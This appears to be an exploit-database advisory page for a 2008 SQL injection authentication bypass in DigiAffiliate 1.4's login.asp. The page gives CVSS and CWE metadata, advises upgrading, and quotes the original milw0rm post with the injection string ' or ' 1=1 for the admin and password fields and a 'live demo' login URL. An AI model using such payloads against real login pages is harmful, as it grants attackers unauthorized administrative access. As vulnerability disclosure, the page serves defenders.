header-logo
Suggest Exploit
vendor:
DigiAffiliate
by:
d3b4gd
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DigiAffiliate
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: YES
Related CWE: N/A
CPE: a:digiappz:digiaffiliate
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

DigiAffiliate <= V1.4 (Auth bypass) SQL Injection Vulnerability

DigiAffiliate version 1.4 suffers from an authentication bypass vulnerability due to a SQL injection flaw in the login.asp script. An attacker can exploit this vulnerability to gain administrative access to the application.

Mitigation:

Upgrade to the latest version of DigiAffiliate.
Source

Exploit-DB raw data:

###############################################################################################
[-] DigiAffiliate <= V1.4 (Auth bypass) SQL Injection Vulnerability
[-] Discovered By : d3b4gd         
[-] Greetz : All my freind         
################################################################################################
Use these information to bypass adminlogin

admin :   ' or ' 1=1
password: ' or ' 1=1

Live demo :

http://www.digiappz.com/digiaffiliate2/login.asp
--------------------------------------------
--------------------------------------------

# milw0rm.com [2008-11-08]

Navigation

Suggest Exploit

Services By CQR